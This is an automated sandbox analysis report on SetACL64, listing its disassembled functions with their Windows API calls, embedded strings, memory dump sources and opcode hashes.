Function 00007FF68686E568 Relevance: 4.5, APIs: 3, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF686873FE0: GetLastError.KERNEL32(?,?,00005D604750197C,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000,00007FF68687D70B,?,?,?), ref: 00007FF686873FEF
Part of subcall function 00007FF686873FE0: SetLastError.KERNEL32(?,?,00005D604750197C,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000,00007FF68687D70B,?,?,?), ref: 00007FF68687408D

CloseHandle.KERNEL32(?,?,00000000,00007FF68686E709,?,?,?,?,00007FF68683EA35), ref: 00007FF68686E5A3
FreeLibraryAndExitThread.KERNELBASE(?,?,00000000,00007FF68686E709,?,?,?,?,00007FF68683EA35), ref: 00007FF68686E5B9

Part of subcall function 00007FF686878230: try_get_function.LIBVCRUNTIME ref: 00007FF68687824E

ExitThread.KERNEL32 ref: 00007FF68686E5C2

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrarytry_get_function
String ID:
API String ID: 1393601959-0
Opcode ID: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
Instruction ID: dceb4f7df0669c43fef2206f225f772f35979a768d0fad60ad255de6074ecd47
Opcode Fuzzy Hash: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
Instruction Fuzzy Hash: 67F03CA1A18A86C2EE145B20905C27C22A5BF84B74F184B3DD73C822E5EF2ADC45C360

Function 00007FF6868730B0 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6868730AF), ref: 00007FF6868730D9
TerminateProcess.KERNEL32(?,?,?,00007FF6868730AF), ref: 00007FF6868730E4
ExitProcess.KERNEL32 ref: 00007FF6868730F3

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
Instruction ID: 59e18a4ca02535f3c5dba18bf09c991be50c26cd87ed0e2f0125d46d8ed3415a
Opcode Fuzzy Hash: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
Instruction Fuzzy Hash: CBE0B860B54705C7E654672598956792262BFC8741F10943DC44E86373DD3FEC55C321

Function 00007FF68683E8C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683EA10

Strings

StartLoggerThreadProc: arg0==NULL, xrefs: 00007FF68683EA3C

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: StartLoggerThreadProc: arg0==NULL
API String ID: 3668304517-2114133805
Opcode ID: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
Instruction ID: 7edb4b9a5cd49bb666634ed739816f073caee6d0955240fc4cf68ce4c92b7050
Opcode Fuzzy Hash: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
Instruction Fuzzy Hash: 624131A2714686C2EF049F29E59D36D6362FF40B88F90443ADB4D4766ADF6ED880C354

Function 00007FF686877BC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF686877BE3

Strings

AppPolicyGetThreadInitializationType, xrefs: 00007FF686877BDC

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: try_get_function
String ID: AppPolicyGetThreadInitializationType
API String ID: 2742660187-3350320272
Opcode ID: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
Instruction ID: 3d5049713480d79797d430cb7c001c16d8387c7092c3090dead06f373b8f59ba
Opcode Fuzzy Hash: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
Instruction Fuzzy Hash: 9DE04FD1F0A906D2FA0547A1A8002B01211BF5C375E48533ADA3D863E0DF3D9D99C7A0

Function 00007FF6868788F8 Relevance: 3.1, APIs: 2, Instructions: 73COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF686878971
GetFileType.KERNELBASE ref: 00007FF686878987

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
Instruction ID: f57ff143fa14e4c43c3edc97beefe5292a639e98ac51d7b5c2769795bae89b82
Opcode Fuzzy Hash: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
Instruction Fuzzy Hash: 6231A8A2B18B46C1D7648B1585902796660FF55BB0F68133DDBAE8B3E0CF3AEC61D311

Function 00007FF68686E500 Relevance: 3.0, APIs: 2, Instructions: 30threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF68686E50E
ExitThread.KERNEL32 ref: 00007FF68686E516

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
Instruction ID: eee4f88e28d12b9f033adee4818bec0d59c88257f9bae10bdfff2733100dfb95
Opcode Fuzzy Hash: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
Instruction Fuzzy Hash: D4F03091B5A746C7EF14AB70945D1BC12A1BF95B10F044438DA0DC23A3EF2EAD44C321

Function 00007FF6868747B8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b8ed42e088179a605e82527c2fbd6198f734ef61ae8345c81d4f4b167e78b3
Instruction ID: 80e5e4174346c48fe5c0553c943e5658a157202bbd4ae169810aacc4425d44c4
Opcode Fuzzy Hash: 73b8ed42e088179a605e82527c2fbd6198f734ef61ae8345c81d4f4b167e78b3
Instruction Fuzzy Hash: 1C816B62A08B81C6E621DF65A4402B977B0FF94B84F009639DF8EA7752DF39E985C350

Function 00007FF6868735C0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

TlsFree.KERNELBASE(?,?,?,00007FF6868733F9,?,?,?,00007FF68687371D,?,?,?,?,?,?,00007FF686872F93), ref: 00007FF686873645

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
Instruction ID: b8b61ec74d821a87000d217d790c73e0836dc1d416991b08099c6faeab6b2472
Opcode Fuzzy Hash: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
Instruction Fuzzy Hash: F7318A62B04B45C2AA108F16E49016973A0BB58FE4F58963ADF6D473A4DF3ED892C341

Function 00007FF68686E218 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686E258

Part of subcall function 00007FF68686892C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6868688D9), ref: 00007FF686868935
Part of subcall function 00007FF68686892C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6868688D9), ref: 00007FF68686895A

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID:
API String ID: 4036615347-0
Opcode ID: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
Instruction ID: bf4db36ab8db133c3625cef79371c971184b857da00d89c3ff60e1485532c1a3
Opcode Fuzzy Hash: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
Instruction Fuzzy Hash: A6215EA1A1D753C3FA149B55A51D2396692BF49B90F044538EF5C8BBD6DE3EDC01C320

Function 00007FF686872FF4 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF686873013

Part of subcall function 00007FF6868730FC: GetModuleHandleExW.KERNEL32 ref: 00007FF686873118
Part of subcall function 00007FF6868730FC: GetProcAddress.KERNEL32 ref: 00007FF68687312E
Part of subcall function 00007FF6868730FC: FreeLibrary.KERNEL32 ref: 00007FF68687314B

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
Instruction ID: 94ee3ddd6467598df2a39a9baec7dc7bd2d120d9e6827edde55d2aa933dde64d
Opcode Fuzzy Hash: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
Instruction Fuzzy Hash: DB214C72F04B01CBEB11CF64D4856AD37B0FB44708F44853AD61D82A95DF3AE985CBA1

Function 00007FF68687D280 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68687D2AB

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
Instruction ID: 2f52407cdd96bf38970160a7579e3ac7f68a84356c3e245f93e19437267f14fa
Opcode Fuzzy Hash: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
Instruction Fuzzy Hash: 36116DB2A2CA82C2F3109B54A44416962A6FF44784F45413DD6ADCB796DF3EFC52CB20

Function 00007FF6868699A4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6868699CF

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
Instruction ID: 0ec6077fb622112607799563dc8b4647506713909478994994e2a58229cb843e
Opcode Fuzzy Hash: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
Instruction Fuzzy Hash: 6C1103B2A14B56DDEB10DFA0D4852EC37B8FB0835CF50052AEA4D56B5AEF34C594C3A0

Function 00007FF68686D5BC Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686D5ED

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
Instruction ID: 0de441a8dc903061041f098eff5ced888e57baab513c5e1a69160b0d1d7128b2
Opcode Fuzzy Hash: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
Instruction Fuzzy Hash: 4A11DFB2A15F56D9EB10CFA0E8840DC37B8FB1839CB50062AEB5D52B59EF34C5A5C790

Function 00007FF686821130 Relevance: 1.5, APIs: 1, Instructions: 20networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF686821171

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
Instruction ID: 5f9963cd24ac20c6b3fda86a4fa83f562118f959bc08396f7abd13f5810a5293
Opcode Fuzzy Hash: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
Instruction Fuzzy Hash: CAF037B1D59586CAFB51E714E8653B533A0FF99744F80043AC64DC62A1DE2FE905CF60

Function 00007FF686874FDC Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF68687403D,?,?,00005D604750197C,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000), ref: 00007FF686875031

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
Instruction ID: 97cab12895228fb44d477477ac194cf0582216144f7e1b0b87bfac3839b0d34e
Opcode Fuzzy Hash: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
Instruction Fuzzy Hash: 0CF090D0B19207C2FF6657A698153B502A17F88B84F4C513CC90EC67D1ED6EEC81C272

Function 00007FF686875094 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF68687BCE1,?,?,00000000,00007FF68687D70B,?,?,?,00007FF6868734C7,?,?,?,00007FF6868733BD), ref: 00007FF6868750D2

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
Instruction ID: 775769313d7560ac7fc501f500eafdddfeb87613615633c595624100f7eb1872
Opcode Fuzzy Hash: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
Instruction Fuzzy Hash: D0F08290B0D307C6FF256762580527411A17F447A8F188338DD2EC62C6DD2EEC81C272

Non-executed Functions

Function 00007FF68687C76C Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68687C7B5

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
Instruction ID: 678695c2bb4fff7f16deece579002792e3f0b85fb940d855dec450c5c7193d32
Opcode Fuzzy Hash: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
Instruction Fuzzy Hash: 52A1E6A2B18685C5EA60CB2694047BAA3B0FF94BD4F54413AEE5D87B94DF3ED845C310

Function 00007FF686843755 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF686843760
GetLastError.KERNEL32 ref: 00007FF68684376E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443DD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844401
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844407
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684440D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844413
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844419
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684441F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684442B

Strings

The version of your operating system could not be determined., xrefs: 00007FF68684379A
Prepare, xrefs: 00007FF6868437C8, 00007FF6868438E5
SetACL only supports Windows Vista and later., xrefs: 00007FF6868438B7

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastVersion
String ID: Prepare$SetACL only supports Windows Vista and later.$The version of your operating system could not be determined.
API String ID: 1165008562-2181592180
